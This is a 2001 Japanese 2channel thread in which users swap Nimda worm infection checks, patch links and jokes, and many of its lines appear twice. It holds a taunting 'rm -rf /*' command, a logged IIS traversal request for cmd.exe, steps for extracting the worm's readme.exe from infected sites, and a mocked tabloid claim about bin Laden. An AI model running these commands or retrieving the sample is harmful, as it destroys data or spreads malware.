今のところは、ワークグループを超えてはこない感じなんだけど。
会社のPCがたくさんやられた。
みんながみんなMSNとかを回って感染したとは考えられん。
シマンテックの解説でも
「ワームはオープンなネットワーク共有を探し、自分自身をコピーします。」
と書いてあるけどLANで繋がってるだけでヤヴァイって事?
今のところは、ワークグループを超えてはこない感じなんだけど。
562 : :01/09/19 13:02 ID:CIjuhvgQ
俺もだんだん、544が可哀想に思えてきた・・・・(w
563 : :01/09/19 13:02 ID:/Sg0yRdA
ID:J6gqWM9Qに神様のご加護がありますように
564 : :01/09/19 13:03 ID:A2Y42Qew
うわぁ。FBIも特別捜査班結成してるのかぁ…。
じゃ前スレでも上がってたこの部分に「あぁ?」って思ってるんだろうなぁ…。
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
じゃ前スレでも上がってたこの部分に「あぁ?」って思ってるんだろうなぁ…。
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
565 : :01/09/19 13:03 ID:N4U8iOCw
566 :名無しさん:01/09/19 13:03 ID:70l4IFsk
568 : :01/09/19 13:03 ID:byucTCuc
569 : :01/09/19 13:03 ID:.0wwXIHk
570 :jobless:01/09/19 13:03 ID:XLetl0lw
横着してIE5.00SP2のままだったから関係なかったYO−(^^)/
571 : :01/09/19 13:04 ID:iOVUc1CA
>561
やっぱ会社は被害受けてるんだね
大変だ、ますます酷くなりそう・・
やっぱ会社は被害受けてるんだね
大変だ、ますます酷くなりそう・・
572 : :01/09/19 13:04 ID:kfsTeeSI
hotmail使ってるんだけどMSNのtopページからじゃなくて
hotmailのログインページに行くのもダメなの?
教えてチャンでごめん。
hotmailのログインページに行くのもダメなの?
教えてチャンでごめん。
573 : :01/09/19 13:04 ID:yAHnr2Qo
574 : :01/09/19 13:04 ID:9aCAso0I
IE入れない企業が多いのも頷ける
575 : :01/09/19 13:05 ID:wOuMO9ng
Vine使ってる初心者です。Konquerorでも伝染りますか?
576 : :01/09/19 13:05 ID:J6gqWM9Q
あーーー面白い煽りだった。
昼終わったから仕事に戻ろうっと。
せいぜいくるしんでろよーーー>ALL Win&IE厨
rm -rf /*
昼終わったから仕事に戻ろうっと。
せいぜいくるしんでろよーーー>ALL Win&IE厨
rm -rf /*
577 : :01/09/19 13:05 ID:c8mjbTxo
578 : :01/09/19 13:05 ID:hsQGmGak
579 :ナナシサン:01/09/19 13:06 ID:ETHVTTR2
>576
サムイ・・・コゴエソウ
サムイ・・・コゴエソウ
581 : :01/09/19 13:06 ID:ZibWL6yc
「J6gqWM9Qはヴァカだけど」が始まるかと期待して見ていたのだが。
582 : :01/09/19 13:06 ID:j4gg3ouk
>『Nimdaは電子メールソフトOutlookのセキュリティ設定が「中」の場合,自動的に実行されるので,かなり感染力が強いようだ。』
↑を「高」に設定する手順を教えてください。
↑を「高」に設定する手順を教えてください。
583 : :01/09/19 13:07 ID:c8mjbTxo
584 :ド素人:01/09/19 13:07 ID:AGkf8kDY
よくわからないけどアップデートできたみたい。汗
IE5.5servise pack2とインターネットツールっていうのをダウンロードしてきた。。。
今度は3分位かかったし。
IE5.5servise pack2とインターネットツールっていうのをダウンロードしてきた。。。
今度は3分位かかったし。
586 :名無しさん:01/09/19 13:07 ID:70l4IFsk
オイラのはIE6のPublicpreviewから>>116の言うとおりDLして
>>313と同じ状況。>一見問題ないように見えるが、
「オフラインブラウズパック」がDL・インストールともに不能。>詩嚢
>>313と同じ状況。>一見問題ないように見えるが、
「オフラインブラウズパック」がDL・インストールともに不能。>詩嚢
588 : :01/09/19 13:08 ID:qasMGDqo
589 : :01/09/19 13:08 ID:hsQGmGak
レス早くなってますね。
やっと追いつけた。
でも、ウィルスも活動が早いみたい。
やっと追いつけた。
でも、ウィルスも活動が早いみたい。
591 : :01/09/19 13:08 ID:Ii9GTKj6
J6gqWM9Qは・・・何か哀しいことでもあったのか?
そんなに自慢げにrmコマンド使われてもなぁ・・・
そんなに自慢げにrmコマンド使われてもなぁ・・・
592 : :01/09/19 13:09 ID:byucTCuc
***感染チェック***
1.NortonAntivirus2001でチェック(9/19以降にパターンファイル更新必要)
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
以下は、感染していないPCの場合・・・・。感染している人はご愁傷様。
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
1.または2.の作業は http://windowsupdate.microsoft.com/?IE で行う。
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
***共通***
3.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
1.NortonAntivirus2001でチェック(9/19以降にパターンファイル更新必要)
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
以下は、感染していないPCの場合・・・・。感染している人はご愁傷様。
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
1.または2.の作業は http://windowsupdate.microsoft.com/?IE で行う。
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
***共通***
3.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
593 : :01/09/19 13:09 ID:CIjuhvgQ
594 : :01/09/19 13:09 ID:ubxxTxCM
readme.exeってどこのへん探せばいい?
595 :ななっすぃ:01/09/19 13:09 ID:ziy7mq.w
バージョンアップしたら
Д
が太く表示されるんだけど、どーして?
Д
が太く表示されるんだけど、どーして?
596 : :01/09/19 13:09 ID:zsQE2Q3w
コピペ
78 名前:量産型ラディン 投稿日:01/09/19 13:08 ID:39GVbFRk
東スポ曰く、
このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。
このウイルスは第3次世界大戦の幕開けだ。
ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。
…らしいです。
ま、いっかぁ東スポだし。
ふーん
78 名前:量産型ラディン 投稿日:01/09/19 13:08 ID:39GVbFRk
東スポ曰く、
このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。
このウイルスは第3次世界大戦の幕開けだ。
ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。
…らしいです。
ま、いっかぁ東スポだし。
ふーん
597 :^^;:01/09/19 13:09 ID:E34zYnC2
みんなで2チャンネルを助けよう!
みんな2チャンネルが危機だという事をしってるか?
みんなで2チャンネルを助けよう!
まず第一に,2チャンネルにある広告は全部1日に必ずワンクリックしよう!
次にひろゆきを助けるホーム―ページにGO!
http://members.tripod.co.jp/boss9/
みんな2チャンネルが危機だという事をしってるか?
みんなで2チャンネルを助けよう!
まず第一に,2チャンネルにある広告は全部1日に必ずワンクリックしよう!
次にひろゆきを助けるホーム―ページにGO!
http://members.tripod.co.jp/boss9/
598 : :01/09/19 13:10 ID:dvZoh28Q
98、95の人はセーフなんですか?
599 :31アイスクリーム:01/09/19 13:10 ID:prNHR8MU
防御対策済みの人はもし感染されたHP見つけたら、メールで知らせて
やってほしいm(__)m。漏れも1件知らせてWEB止めさせた。
1人1殺Nimda虫!
やってほしいm(__)m。漏れも1件知らせてWEB止めさせた。
1人1殺Nimda虫!
600 : :01/09/19 13:10 ID:WTghJb5I
他の板では全然話題になってないけどどうなのよ?
601 : :01/09/19 13:10 ID:ZGnsXA6c
602 : :01/09/19 13:10 ID:AXdw0Hxk
605 : :01/09/19 13:11 ID:Y5AkCUiQ
>>575
爆笑王を思い出させるような負け惜しみぶりだな
% kill -9 `ps -ef | grep J6gqWM9Q | awk '{print $2}'`
といったところか
ブラウザ立ち上げ直してID変えたら固定ハンドルでみんなを楽しませてくれよな
爆笑王を思い出させるような負け惜しみぶりだな
% kill -9 `ps -ef | grep J6gqWM9Q | awk '{print $2}'`
といったところか
ブラウザ立ち上げ直してID変えたら固定ハンドルでみんなを楽しませてくれよな
606 : :01/09/19 13:12 ID:hsQGmGak
8/15から中国にふぁっくされてる前スレ500はネットワーク遮断したのかな?
607 : :01/09/19 13:12 ID:Ii9GTKj6
608 :名無しさん:01/09/19 13:12 ID:pxo5up2Q
あぶねーあぶねー、2ちゃん見てなかったら爆死していたところだった。
ソフトによるウイルスチェックはしていないけど、emlなどのファイルを
検索しても見つからなかったので感染していないのかな?
ソフトによるウイルスチェックはしていないけど、emlなどのファイルを
検索しても見つからなかったので感染していないのかな?
609 :初心者さん:01/09/19 13:12 ID:bq3Ce/eg
Internet Explorer6にすると何かいいことあるの?
610 : :01/09/19 13:12 ID:0C89g52A
俺は元々IE6なんだけど、さっき試しにノートンかけてみたらW32.Nimda.A@mm検出したよ
IEのテンポラリーファイルにreedme[1].emlってのがあった
どういうことよ?
IEのテンポラリーファイルにreedme[1].emlってのがあった
どういうことよ?
611 : :01/09/19 13:12 ID:kNF/Pobc
613 :ド素人:01/09/19 13:12 ID:AGkf8kDY
>589
>会社から2KとかNTだったりしないよね?
ん?2Kってなんだろう?2000年モデルのことかな?
私は自宅からです、、、。
>会社から2KとかNTだったりしないよね?
ん?2Kってなんだろう?2000年モデルのことかな?
私は自宅からです、、、。
614 : :01/09/19 13:12 ID:n5wmWdo2
マイクロソフトのHPが感染してるって事は無いんでしょうか?
615 :名無しさん:01/09/19 13:13 ID:70l4IFsk
616 : :01/09/19 13:13 ID:Y5AkCUiQ
617 : :01/09/19 13:13 ID:hsQGmGak
619 : :01/09/19 13:14 ID:0C89g52A
620 : :01/09/19 13:14 ID:CZ4aawQ.
アタックが止まらない。なんじゃこりゃ…。
co.jpとか来てるし。そんな会社、二度と信用するものか。
co.jpとか来てるし。そんな会社、二度と信用するものか。
621 :ド素人:01/09/19 13:14 ID:AGkf8kDY
>618
あ、なるほど。
私は確かWIN MEだった。。。
あ、なるほど。
私は確かWIN MEだった。。。
622 : :01/09/19 13:15 ID:kfsTeeSI
誤爆しまくり…ふざけてやってるようだが本気だ
今度はあえて訂正しないでおこう
へへ、おりこうさんだねъ( ゚ー^)
今度はあえて訂正しないでおこう
へへ、おりこうさんだねъ( ゚ー^)
624 : :01/09/19 13:15 ID:OO3wQbOI
>>494
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi
に掲載されているサイトにアクセスして
/readme.eml
をダウンロード
ソースから慎重にMIMEデコードして、readme.exeを取りだす。
(redme.emlを不用意に読むと、readme.exeを実行されてしまうおそれ有り。)
http://www.stride.co.jp/~z32/cgi-bin/worm.cgi
に掲載されているサイトにアクセスして
/readme.eml
をダウンロード
ソースから慎重にMIMEデコードして、readme.exeを取りだす。
(redme.emlを不用意に読むと、readme.exeを実行されてしまうおそれ有り。)
625 : :01/09/19 13:15 ID:spzt.8VY
626 :僕も初心者:01/09/19 13:15 ID:zsQE2Q3w
627 : :01/09/19 13:16 ID:J6gqWM9Q
628 : :01/09/19 13:16 ID:byucTCuc
629 : :01/09/19 13:16 ID:yU4SCrCU
今日はラディン・テロどころじゃないな。
630 : :01/09/19 13:16 ID:Ov9UHeQs
なんなんだ・・急にco.jpとかac.jpとか・・ヤバいねこりゃ・・
632 :ナナシサン:01/09/19 13:17 ID:ETHVTTR2
>697
かえってくんな(w
かえってくんな(w
633 : :01/09/19 13:17 ID:aUHlluYA
まっすぐ2chに来て良かったー。IE5.5 SP1なんだもんよー。
週末にIE6ver.upするつもりだったけど、今すぐやるよ。
週末にIE6ver.upするつもりだったけど、今すぐやるよ。
634 : :01/09/19 13:17 ID:ZGnsXA6c
>アドレスのhttp://の左側にあるマークの色が水色っぽく変わった
InternetExproler6の特徴だよ。
Internet Explorer 6 をダウンロードしちゃえば問題無いよ
http://www.microsoft.com/windows/ie_intl/ja/
InternetExproler6の特徴だよ。
Internet Explorer 6 をダウンロードしちゃえば問題無いよ
http://www.microsoft.com/windows/ie_intl/ja/
635 : :01/09/19 13:17 ID:hsQGmGak
なんかMSN見てたら腹立ってきた。
全然アナウンスが見つからないよ…。
誰かが貼ってたアナウンスってどこから見りゃいいんだ?
全然アナウンスが見つからないよ…。
誰かが貼ってたアナウンスってどこから見りゃいいんだ?
>>606
見れなくなったサイトは、
そこだけじゃないみたい。
↓お祭りサイト集
http://search.fresheye.com/?kw=readme.eml&term=monthly
あれ?増殖33件のまま、とまってる?
見れなくなったサイトは、
そこだけじゃないみたい。
↓お祭りサイト集
http://search.fresheye.com/?kw=readme.eml&term=monthly
あれ?増殖33件のまま、とまってる?
637 : :01/09/19 13:17 ID:J6gqWM9Q
638 :ふしあなさん:01/09/19 13:17 ID:Fo8/uO8I
そんな事より、きいてくれる?
昨晩、インターネット見てたんです。インターネット。
そしたらなんかウイルスがめちゃくちゃいっぱいで立ち上がらないんです。
で、よく見たらなんか窓が出てて、『一般保護違反です』とか書いてあるんです。
もうね、アホかと。馬鹿かと。
お前らな、一般保護違反如きで普段見てないインターネットに来てんじゃねーよ、ボケが。
一般保護違反だよ、一般保護違反。
なんかウイルス感染サイトとかもあるし。一家4台とも感染か。おめでてーな。
よーしパパ修理頼んじゃうぞー、とか言ってるの。もう見てらんない。
お前らな、メリッサやるからその台空けろと。
インターネットってのはな、もっと殺伐としてるべきなんだよ。
回線の向かいに座った奴といつ喧嘩が始まってもおかしくない、
感染させるか感染させられるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと駆除できたかと思ったら、隣の奴が、CODE−RED、とか言ってるんです。
そこでまたぶち切れですよ。 あのな、CODE−REDなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、CODE−RED、だ。
お前は本当にCODE−REDに感染したいのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、CODE−REDって言いたいだけちゃうんかと。
ウイルスの俺から言わせてもらえば今、ウイルス通の間での最新流行はやっぱり、
Nimda 、これだね。
W32.Nimda.A@mm大盛りねぎだくギョク。これが通の感染の仕方。
W32ってのは自動メール送信ワームが多めに入ってる。そん代わり件名が少なめ。これ。
で、それにリモートアクセス(遠隔操作)。これ有効。
しかしこれに感染させると、次からエシュロンにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあ、i-MACでも使ってなさいってこった。
昨晩、インターネット見てたんです。インターネット。
そしたらなんかウイルスがめちゃくちゃいっぱいで立ち上がらないんです。
で、よく見たらなんか窓が出てて、『一般保護違反です』とか書いてあるんです。
もうね、アホかと。馬鹿かと。
お前らな、一般保護違反如きで普段見てないインターネットに来てんじゃねーよ、ボケが。
一般保護違反だよ、一般保護違反。
なんかウイルス感染サイトとかもあるし。一家4台とも感染か。おめでてーな。
よーしパパ修理頼んじゃうぞー、とか言ってるの。もう見てらんない。
お前らな、メリッサやるからその台空けろと。
インターネットってのはな、もっと殺伐としてるべきなんだよ。
回線の向かいに座った奴といつ喧嘩が始まってもおかしくない、
感染させるか感染させられるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと駆除できたかと思ったら、隣の奴が、CODE−RED、とか言ってるんです。
そこでまたぶち切れですよ。 あのな、CODE−REDなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、CODE−RED、だ。
お前は本当にCODE−REDに感染したいのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、CODE−REDって言いたいだけちゃうんかと。
ウイルスの俺から言わせてもらえば今、ウイルス通の間での最新流行はやっぱり、
Nimda 、これだね。
W32.Nimda.A@mm大盛りねぎだくギョク。これが通の感染の仕方。
W32ってのは自動メール送信ワームが多めに入ってる。そん代わり件名が少なめ。これ。
で、それにリモートアクセス(遠隔操作)。これ有効。
しかしこれに感染させると、次からエシュロンにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあ、i-MACでも使ってなさいってこった。
639 : :01/09/19 13:18 ID:CIjuhvgQ
640 :CookieMonster:01/09/19 13:18 ID:RpkGMlcw
そんな事より1よ、ちょいと聞いてくれよ。スレとあんま関係ないけどさ。
このあいだ、近所のWindowsUpdateに行ったんです。WindowsUpdate。
そしたらなんか人がめちゃくちゃいっぱいで入れないんです。
で、よく見たらなんかIE5.5SP2とかDLしてるんです。IE5.5SP2。
もうね、アホかと。馬鹿かと。
お前らな、IE5.5SP2ごときで普段来てないWindowsUpdateに来てんじゃねーよ、ボケが。
IE5.5SP2だよ、IE5.5SP2。
なんか親子連れとかもいるし。一家4人でWindowsUpdateか。おめでてーな。
よーしパパが大丈夫かMSNに繋いでみちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、Nimda送ってやるから黙って感染してろと。
WindowsUpdateってのはな、もっと殺伐としてるべきなんだよ。
当てたパッチにバグがあって、いつブルー画面や再起動しなくなってもおかしくない、
刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと入れたかと思ったら、隣の奴が、セキュリティ問題の修正プログラムじゃねー?、とか言ってるんです。
そこでまたぶち切れですよ。
あのな、セキュリティ問題の修正プログラムなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、セキュリティ問題の修正プログラムじゃねー?、だ。
お前は本当にセキュリティ問題の修正プログラムと思っているのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、バカなだけちゃうんかと。
通の俺から言わせてもらえば今、WindowsUpdate通の間での最新流行はやっぱり、重要な更新の通知、これだね。
重要な更新の通知。これが通のやり方。
重要な更新の通知ってのはリソース消費が多めに入ってる。そん代わり役立ち度は少なめ。これ。
で、こいつの自動受信でまたバグパッチ。これ最強。
しかもこれをやると次から複数同一シリアルのユーザーはACCSにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前、1は、Happy99の花火でも見てなさいってこった。
このあいだ、近所のWindowsUpdateに行ったんです。WindowsUpdate。
そしたらなんか人がめちゃくちゃいっぱいで入れないんです。
で、よく見たらなんかIE5.5SP2とかDLしてるんです。IE5.5SP2。
もうね、アホかと。馬鹿かと。
お前らな、IE5.5SP2ごときで普段来てないWindowsUpdateに来てんじゃねーよ、ボケが。
IE5.5SP2だよ、IE5.5SP2。
なんか親子連れとかもいるし。一家4人でWindowsUpdateか。おめでてーな。
よーしパパが大丈夫かMSNに繋いでみちゃうぞー、とか言ってるの。もう見てらんない。
お前らな、Nimda送ってやるから黙って感染してろと。
WindowsUpdateってのはな、もっと殺伐としてるべきなんだよ。
当てたパッチにバグがあって、いつブルー画面や再起動しなくなってもおかしくない、
刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。
で、やっと入れたかと思ったら、隣の奴が、セキュリティ問題の修正プログラムじゃねー?、とか言ってるんです。
そこでまたぶち切れですよ。
あのな、セキュリティ問題の修正プログラムなんてきょうび流行んねーんだよ。ボケが。
得意げな顔して何が、セキュリティ問題の修正プログラムじゃねー?、だ。
お前は本当にセキュリティ問題の修正プログラムと思っているのかと問いたい。問い詰めたい。小1時間問い詰めたい。
お前、バカなだけちゃうんかと。
通の俺から言わせてもらえば今、WindowsUpdate通の間での最新流行はやっぱり、重要な更新の通知、これだね。
重要な更新の通知。これが通のやり方。
重要な更新の通知ってのはリソース消費が多めに入ってる。そん代わり役立ち度は少なめ。これ。
で、こいつの自動受信でまたバグパッチ。これ最強。
しかもこれをやると次から複数同一シリアルのユーザーはACCSにマークされるという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前、1は、Happy99の花火でも見てなさいってこった。
641 :東スポいわく:01/09/19 13:18 ID:zsQE2Q3w
642 : :01/09/19 13:18 ID:jDmQpsF2
643 : :01/09/19 13:18 ID:byucTCuc
644 :初心者:01/09/19 13:19 ID:bq3Ce/eg
645 :ド素人:01/09/19 13:19 ID:AGkf8kDY
>631
そかー。良かった、、、無事にダウンロードできたみたいで、、、。
ウィルスにやられても私の力じゃ到底復旧出来ないし。汗
そかー。良かった、、、無事にダウンロードできたみたいで、、、。
ウィルスにやられても私の力じゃ到底復旧出来ないし。汗
646 : :01/09/19 13:20 ID:A2Y42Qew
647 :113:01/09/19 13:20 ID:LNEMDmj.
結局やばかった時間はいつ頃なんだろう?
昨日のPM7-8時頃MSN行ったけど大丈夫っぽい。
昨日のPM7-8時頃MSN行ったけど大丈夫っぽい。
648 :640:01/09/19 13:21 ID:RpkGMlcw
638のほうが面白ぇ・・・。
打つ堕し脳・・・
打つ堕し脳・・・
649 : :01/09/19 13:21 ID:ZB0YSVAY
…アップデートできねえ…
651 : :01/09/19 13:21 ID:c8mjbTxo
652 : :01/09/19 13:22 ID:Y5AkCUiQ
653 : :01/09/19 13:22 ID:Qz4KH6oo
654 : :01/09/19 13:22 ID:j4gg3ouk
>>582が分かる方いませんか?
655 : :01/09/19 13:23 ID:spzt.8VY
656 : :01/09/19 13:23 ID:bi15wNtM
w2kなんですが、
さっき雑誌買ってきてIEを入れなおしました。
バージョンにやっぱりSP2ってついてないんですが。
ネットで落とさなくちゃ駄目なんでしょうか?
さっき雑誌買ってきてIEを入れなおしました。
バージョンにやっぱりSP2ってついてないんですが。
ネットで落とさなくちゃ駄目なんでしょうか?
何て親切なんだ。さっそくUPDATEしたよ。
659 :ななしさん:01/09/19 13:24 ID:K0x/0bfc
やっとcoderedのXXXXがろぐからすくなくなったのにこんどは
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0"
こんなんばっかだよ。
最初にきたのが[18/Sep/2001:22:23:37 +0900]
だからそれからあっという間に感染したのかな・・・。
またネットが重くなるな。
"GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0"
こんなんばっかだよ。
最初にきたのが[18/Sep/2001:22:23:37 +0900]
だからそれからあっという間に感染したのかな・・・。
またネットが重くなるな。
660 : :01/09/19 13:24 ID:J6gqWM9Q
661 :関連スレ(ネタあり):01/09/19 13:24 ID:6bKYUMSc
http://news.2ch.net/test/read.cgi?bbs=news&key=1000867662
スーパー初心者のためのMSNウイルスすれ。
スーパー初心者のためのMSNウイルスすれ。
662 : :01/09/19 13:24 ID:byucTCuc
663 :名無しさん:01/09/19 13:24 ID:70l4IFsk
664 : :01/09/19 13:25 ID:jDmQpsF2
665 :654:01/09/19 13:25 ID:j4gg3ouk
>>662さん ありがとう
666 : :01/09/19 13:25 ID:RmQw2Dvk
>>655はなに?
667 : :01/09/19 13:26 ID:TLylaCmY
俺IE6.0(テスト版)だけど、テスト版でも大丈夫なんかいな?
668 :IE5の:01/09/19 13:26 ID:ALUfLgrg
バージョン5.00.3314.42101.
なんだけど
更新バージョンがSP2になってるから安全ですか?
なんだけど
更新バージョンがSP2になってるから安全ですか?
669 : :01/09/19 13:26 ID:byucTCuc
670 : :01/09/19 13:26 ID:BdNy5bZY
ワクチンまだ?
漏れ・・・ディスク検索終了>異常なし
ちなみにIE6は6.00.2600.0000 +Winme
ちなみにIE6は6.00.2600.0000 +Winme
>>660
そーか、仕事中だったのか。頑張ってくれな。
仕事が終わったら "nanasisanってどうよ?" とか "J6gqWM9Qだけど、何かある?"
とかスレを立ててくれ。一回くらいは書いておくから(w
>>667
IE6正式版が出たので、そちらにバージョンアップすると良いでしょう。
テスト版については未確認(細かいバージョンによって違うこともある)なので、
念のためウイルスチェックをしておくと良いでしょう。
そーか、仕事中だったのか。頑張ってくれな。
仕事が終わったら "nanasisanってどうよ?" とか "J6gqWM9Qだけど、何かある?"
とかスレを立ててくれ。一回くらいは書いておくから(w
>>667
IE6正式版が出たので、そちらにバージョンアップすると良いでしょう。
テスト版については未確認(細かいバージョンによって違うこともある)なので、
念のためウイルスチェックをしておくと良いでしょう。
673 : :01/09/19 13:29 ID:gFkF4KKs
674 : :01/09/19 13:30 ID:byucTCuc
***感染チェック***
1.NortonAntivirus2001でチェック(9/19以降にパターンファイル更新必要)
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
以下は、感染していないPCの場合・・・・。感染している人はご愁傷様。
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
1.または2.の作業は http://windowsupdate.microsoft.com/?IE で行う。
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
***共通***
3.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
1.NortonAntivirus2001でチェック(9/19以降にパターンファイル更新必要)
2.トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
以下は、感染していないPCの場合・・・・。感染している人はご愁傷様。
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
1.または2.の作業は http://windowsupdate.microsoft.com/?IE で行う。
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
***共通***
3.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
Trendmicro社 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm
日本ネットワークアソシエイツ社 http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
MS社 http://help.msn.co.jp/notice.htm
675 :673:01/09/19 13:31 ID:gFkF4KKs
すまん間違えた、5.00は知らん。
>>670
NortonとVirus BusterとMcAfeeはいずれも対応したみたい。
McAfeeについてはココ。
http://www.mcafee.com/anti-virus/viruses/nimda/default.asp?cid=2444
NortonとVirus BusterとMcAfeeはいずれも対応したみたい。
McAfeeについてはココ。
http://www.mcafee.com/anti-virus/viruses/nimda/default.asp?cid=2444
677 : :01/09/19 13:31 ID:J6gqWM9Q
678 : :01/09/19 13:32 ID:CIjuhvgQ
そろそろ戻ってくるかな?(-。- )
679 : :01/09/19 13:31 ID:kNF/Pobc
>>622
昨日の11時過ぎだと、まだMSNではNimda配布中か、対策直後か。
とにかくreadme.exeをブラウザから落とした記憶・実行した記憶
があるのであれば、感染可能性大です。
IE5.5SP1云々の話はメールでの感染経路の際に問題になるので、
早急にSP2にバージョンアップが必要です。たとえSP2にしても
ブラウザで感染サーバのWEBページ閲覧時にはダウンロード指定が
かかってしまいますけどね。その段階でとりあえずメール→OUTLOOK
経由での無意識感染は防げると。
昨日の11時過ぎだと、まだMSNではNimda配布中か、対策直後か。
とにかくreadme.exeをブラウザから落とした記憶・実行した記憶
があるのであれば、感染可能性大です。
IE5.5SP1云々の話はメールでの感染経路の際に問題になるので、
早急にSP2にバージョンアップが必要です。たとえSP2にしても
ブラウザで感染サーバのWEBページ閲覧時にはダウンロード指定が
かかってしまいますけどね。その段階でとりあえずメール→OUTLOOK
経由での無意識感染は防げると。
680 :ウイルス:01/09/19 13:32 ID:5U62y4GY
我地に平和を与えんために来たと思うなかれ。
我汝等に告ぐ、然らず、むしろ争いなり。
今から後一家に5人あらば3人は2人に、
2人は3人に分かれて争わん。
父は子に、子は父に、母は娘に、娘は母に
我汝等に告ぐ、然らず、むしろ争いなり。
今から後一家に5人あらば3人は2人に、
2人は3人に分かれて争わん。
父は子に、子は父に、母は娘に、娘は母に
681 : :01/09/19 13:33 ID:ALUfLgrg
>673
サンクスコ。てゆか書いてあったよ感染チェックなとこに。
サンクスコ。てゆか書いてあったよ感染チェックなとこに。
682 :共同通信:01/09/19 13:34 ID:3qEhW3xw
13:30 ★都留信組が感染 コンピューターウイルス
683 : :01/09/19 13:35 ID:tNwPfZy6
で、どういう症状が出るの?
684 : :01/09/19 13:35 ID:kNF/Pobc
685 : :01/09/19 13:36 ID:jDmQpsF2
686 : :01/09/19 13:37 ID:CIjuhvgQ
関係無いがマリナーズが勝った。。。
>>677
マジ話で3歳なんだけどな・・匿名である以上信じて貰えないかもしれないけど。
もちろん漢字とか英語の難しいものとかは読めないので父親の支援はしてもらってたけど。
その後に父親が英語とPCに対して恐怖症(胃潰瘍っぽい)になってしまって入院したけど。
以後Windows98が出てくるまで、父はPCを触ることが出来なかった。
マジ話で3歳なんだけどな・・匿名である以上信じて貰えないかもしれないけど。
もちろん漢字とか英語の難しいものとかは読めないので父親の支援はしてもらってたけど。
その後に父親が英語とPCに対して恐怖症(胃潰瘍っぽい)になってしまって入院したけど。
以後Windows98が出てくるまで、父はPCを触ることが出来なかった。
688 : :01/09/19 13:38 ID:kfsTeeSI
689 : :01/09/19 13:39 ID:OO3wQbOI
